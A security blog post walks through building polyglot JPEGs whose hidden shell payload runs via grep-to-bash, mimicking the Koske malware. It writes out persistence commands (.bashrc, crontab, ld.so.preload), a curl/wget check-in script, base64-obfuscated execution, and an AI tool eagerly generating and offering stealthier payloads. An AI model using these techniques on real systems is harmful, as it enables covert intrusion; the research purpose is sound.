The One-Man APT, Part I: A Picture That Can Execute Code on the Target






Have you ever wondered if it’s possible to replicate the stealthy behavior of a modern cyber‑attack using artificial intelligence? As part of my research, I focused on the techniques used by a Linux-based threat known as Koske — malware that cleverly hides inside AI-generated panda images and executes a range of actions like in-memory code execution, system manipulation, and crypto mining.





I set out to reproduce some of its tactics using non-malicious components to better understand how these advanced mechanisms operate in real environments. Here’s how that exploration unfolded.









Picture source: Aquasec





This picture illustrates the attack flow of Koske, a modular Linux-based threat that uses AI-generated panda images to deliver hidden payloads. It begins with a polyglot image hosted online that carries embedded C or shell code. Once that payload is extracted and executed, it installs components directly in memory, abuses common persistence mechanisms (.bashrc, crontab, or custom systemd services), and deploys a rootkit via LD_PRELOAD. The final stage includes cryptominer deployment, proxy setup, and process manipulation, all designed to quietly take over the system while staying under the radar.
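
To make those persistence mechanisms concrete, here is a minimal sketch of what abuse of each one typically looks like on a Linux host. The paths are hypothetical and this is not Koske's actual code, just the general shape of each technique:

# 1. Shell profile: relaunch a payload on every interactive login
echo '/tmp/.hidden/payload.sh &' >> ~/.bashrc

# 2. Cron: re-execute the payload every 10 minutes
(crontab -l 2>/dev/null; echo '*/10 * * * * /tmp/.hidden/payload.sh') | crontab -

# 3. LD_PRELOAD: force a shared object into every dynamically
#    linked process (writing this file requires root)
echo '/tmp/.hidden/rootkit.so' >> /etc/ld.so.preload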





But for me, the idea for this project began with a simple question: Can an image also act as executable code? That led me to explore polyglot files—specifically, how a single file can be both a valid image and a shell script. The screenshot below shows the initial interaction that kicked things off. From there, I started experimenting with crafting image files that look innocent when opened normally, but could behave differently when handled by command-line tools like grep or cat. That duality became the core concept behind my simulation.
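
That duality is easier to see with a concrete build step. The sketch below assumes a benign payload.sh and any valid cat.jpg (both hypothetical names); it works because most JPEG viewers stop parsing at the end-of-image marker, so bytes appended after the image data are ignored by the viewer but remain visible to text tools:

# Append a marked shell script after the JPEG's image data.
# Viewers still render the picture normally; grep and cat see the trailing text.
cp cat.jpg polyglot.jpg
printf '\n# PAYLOAD\n' >> polyglot.jpg
cat payload.sh >> polyglot.jpg

# The result still identifies as an image, because file(1) only
# reads the magic bytes at the start:
file polyglot.jpg    # polyglot.jpg: JPEG image data, ...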









Simulating Execution from a Picture





To simulate the execution stage of the attack, I crafted a polyglot file: a valid image with a shell script hidden inside. The key was choosing a simple yet realistic way to "extract and execute" the script without requiring complex tooling. That's where the command grep -a -A9999 '# PAYLOAD' polyglot.jpg | bash comes in.





This line mimics the behavior seen in Koske, where the payload is embedded in an image and executed directly without being written to disk. By using grep -a (to treat the binary file as text) and a marker like # PAYLOAD, I could isolate the script and pipe it into bash, triggering execution from inside the image, just as Koske loads and runs its shellcode in memory after pulling an image file down from a remote server.
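
Annotated, the one-liner works like this. Note that grep prints the marker line itself too, but since it begins with #, bash treats it as a comment:

# -a: treat the binary JPEG as plain text
# -A9999: print up to 9999 lines following the matching marker line,
#         i.e. everything appended after the image data
grep -a -A9999 '# PAYLOAD' polyglot.jpg | bash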





It’s not an exact replica, of course, but the mechanism aligns with the spirit of the attack: execution without obvious binaries, blending in with ordinary content.









Payload in Action





Once I described what I needed, the AI tool generated the polyglot image for me—already crafted and ready to execute. I didn’t have to manually append a script or build the file structure myself. The result was polyglot.jpg, a single file that looked like an ordinary image but contained a shell payload hidden inside.









As in the screenshot below, the file looks and behaves just like a regular image. It opens normally in the image viewer, and even the file command confirms it’s a valid JPEG. There’s nothing unusual on the surface. This is what makes the technique so deceptive—and so interesting to explore. The payload remains invisible unless someone knows exactly what to look for and how to extract it.
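
For anyone reproducing the check, the commands below show both the innocent surface and the one place the payload gives itself away; the output comments are illustrative:

file polyglot.jpg         # JPEG image data ... (the magic bytes win)
xdg-open polyglot.jpg     # opens normally in the default image viewer

# Only a targeted look at the trailing bytes reveals anything:
grep -a -n '# PAYLOAD' polyglot.jpg
tail -c 200 polyglot.jpg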









In the GIF below, you can see the moment the illusion breaks: what looks like an innocent picture suddenly launches a new terminal when piped through a simple grep command. It’s a subtle but powerful example of how polyglot files can behave very differently depending on how they’re handled.









Taking It a Step Further





At this point, I wanted the behavior to go beyond just launching a terminal—I wanted something closer to what an APT like Koske might actually do. So I asked the AI to generate a script that could reach out to a local server, simulating a basic command-and-control (C2) check-in.






What it returned was a simple but smart piece of code that checks if curl or wget is available and then uses whichever is present to send a request to a target URL. I didn’t write any of this—the AI generated it instantly. That matters because it demonstrates how easily AI can recreate behavior we often see in real attacks: stealthy communication, adaptability to the environment, and minimal dependencies. It’s not just about hiding in a file anymore—it’s about establishing presence and reaching out, just like real malware does during the C2 phase.
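
The AI's exact output isn't reproduced here, but a script with the behavior described is only a few lines. A sketch, assuming a hypothetical local listener at http://127.0.0.1:8080/checkin:

#!/bin/bash
# Simulated C2 check-in: prefer curl, fall back to wget, fail quietly.
URL="http://127.0.0.1:8080/checkin"

if command -v curl >/dev/null 2>&1; then
    curl -s "$URL"
elif command -v wget >/dev/null 2>&1; then
    wget -qO- "$URL"
else
    exit 1
fi

For testing, something as simple as python3 -m http.server 8080 running in another shell is enough to stand in for the C2 endpoint.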









Custom Payload, Fully Embedded





Once I saw that the AI could generate working scripts on the fly, I pushed the idea a little further. I asked: Can you embed this new script—complete with environment checks and a simulated C2 call—directly into a new polyglot image?





The AI did exactly that. It returned an updated image file, polyglot_custom.jpg, with the full script now baked into it. When executed, it launches a new terminal and immediately runs the embedded logic. This mimics how some real APTs operate, including Koske—using modular payloads that adapt to the system they land on and initiate contact with a remote server, often without leaving obvious traces on disk.
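
The embedded script isn't reproduced verbatim here, but combining the two behaviors gives a payload along these lines (x-terminal-emulator is Debian's terminal alias, and the URL and structure are my assumptions, not the AI's exact output):

# PAYLOAD
# Illustrative combined payload as appended to polyglot_custom.jpg:
# pick whichever HTTP client exists, then run the check-in in a new terminal.
URL="http://127.0.0.1:8080/checkin"
if command -v curl >/dev/null 2>&1; then
    x-terminal-emulator -e bash -c "curl -s $URL; read" &
elif command -v wget >/dev/null 2>&1; then
    x-terminal-emulator -e bash -c "wget -qO- $URL; read" &
fi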





Again, I didn’t write a single line manually—the AI generated the code and repackaged the payload entirely on its own.









Unexpected but Relevant: Obfuscation





What really caught my attention at this stage was something I hadn’t even asked for. After generating the updated polyglot image and confirming it worked, the AI proactively suggested: “Let me know if you want to obfuscate or encode the payload further.”





This moment felt significant. Obfuscation and encoding are common techniques used in real-world malware to bypass detection, delay reverse engineering, or simply add layers of complexity. The fact that the AI offered it by default, not as an advanced feature but as the next natural step, made the whole experiment feel eerily close to how an actual automated malware builder might behave. And again, I didn’t request this; the AI simply offered it, suggesting that this logic is deeply embedded in its response pattern.
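
Base64 is the classic first layer for this kind of step, so as an illustration, accepting that offer could look like the sketch below; the encoding choice is an assumption, not the AI's actual output. The appended line then carries no readable strings, and the extraction stage grows a decode step:

# Build: append the marker plus a base64-encoded payload
# (-w0 is GNU base64's "no line wrapping" flag)
{ printf '\n# PAYLOAD\n'; base64 -w0 payload.sh; } >> polyglot.jpg

# Run: drop the marker line, decode, then execute
grep -a -A9999 '# PAYLOAD' polyglot.jpg | tail -n +2 | base64 -d | bash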









Self-Correcting Logic





After accepting the AI’s suggestion to embed a more advanced payload inside the image, I encountered a small issue during execution: the script wasn’t expanding the $URL variable correctly inside the terminal window. Instead of debugging it myself, I decided to stick with the rules of my experiment—no manual coding. So I simply showed the AI the terminal output, without any explanation.





To my surprise, it immediately identified the issue: a misuse of quotes in the heredoc block that prevented variable expansion. Then, it proposed a clean fix—rewriting the script to correctly inject the environment variable and execute it via a temporary file. This wasn’t just helpful—it demonstrated something deeper: the AI wasn’t just generating payloads, it was debugging them and evolving them based on runtime behavior.
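
The quoting pitfall it found is a classic one and easy to show in isolation. In the broken variant the heredoc delimiter is quoted, which suppresses expansion, so the generated script carries the literal text $URL; the fix expands the variable at generation time and runs the result from a temporary file, as the AI proposed (file names here are hypothetical):

URL="http://127.0.0.1:8080/checkin"

# Broken: the quoted delimiter ('EOF') disables expansion,
# so /tmp/payload_run.sh literally contains: curl -s "$URL"
cat <<'EOF' > /tmp/payload_run.sh
curl -s "$URL"
EOF

# Fixed: an unquoted delimiter expands $URL while writing the file,
# which is then executed as a temporary script.
cat <<EOF > /tmp/payload_run.sh
curl -s "$URL"
EOF
bash /tmp/payload_run.sh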





Again, I didn’t write a line. The logic, the patch, and the delivery came entirely from the AI.













Regenerating and Retesting





Naturally, I agreed to let the AI fix the issue and regenerate the payload. Within moments, I received a new version: polyglot_fixed.jpg. This time, the script executed flawlessly—the $URL variable expanded correctly, and the C2 simulation completed as expected.





But what stood out even more was the AI’s follow-up: it offered to add stealth features or test the payload against other services. It wasn’t just patching—it was suggesting the next logical evolution of the attack, almost like an automated red team agent thinking ahead. This reinforced the idea that AI doesn’t just generate content; it iterates, adapts, and proposes improvements, mimicking the decision-making processes we usually associate with human adversaries.









Test: Success





With everything in place, I ran the final test. As shown in the GIF, executing the polyglot_fixed.jpg file using the same grep | bash technique worked exactly as expected. The script executed cleanly, reached the internal server, and displayed the response—all within a self-contained, AI-generated polyglot image.
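
For completeness, the whole end-to-end test fits in two commands; the throwaway Python listener stands in for a real C2 endpoint, so any HTTP response (even a 404) proves the check-in fired:

# In one shell: a stand-in "C2" listener
python3 -m http.server 8080

# In another: trigger the payload straight out of the image
grep -a -A9999 '# PAYLOAD' polyglot_fixed.jpg | bash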





This confirmed that the AI wasn’t just generating code, but delivering a functional, modular payload that simulates command-and-control behavior in a format designed to look entirely harmless at first glance.









Summary





The entire workflow closely mirrors the tactics, techniques, and procedures (TTPs) attributed to the Koske malware campaign.





First, Koske uses polyglot image files to deliver hidden payloads while preserving legitimate image rendering—this was replicated by embedding AI-generated shell scripts into valid JPEG files that remained viewable.





Second, Koske executes its code in memory, avoiding persistent binaries and writes to disk. This was echoed in the use of grep | bash to extract and run the payload directly from within the image.





Third, Koske exhibits environmental awareness by adapting its behavior based on the host system—similarly, the AI-generated script dynamically chose between curl and wget depending on availability. Lastly, Koske includes C2 capabilities, reaching out to predefined URLs to initiate external communication.





This was emulated through a test script contacting a local server, fully encapsulated in the image. The step-by-step logical progression in this simulation follows the operational structure of Koske almost point by point, with each phase deliberately aligned to a real-world TTP, but executed in a controlled, non-malicious environment using AI as the only development tool.





Until next time…





SmouK out!





The post The One-Man APT, Part I: A Picture That Can Execute Code on the Target first appeared on Hackers Arise.



Source: HackersArise
Source Link: https://hackers-arise.com/the-one-man-apt-part-i-a-picture-that-can-execute-code-on-the-target/

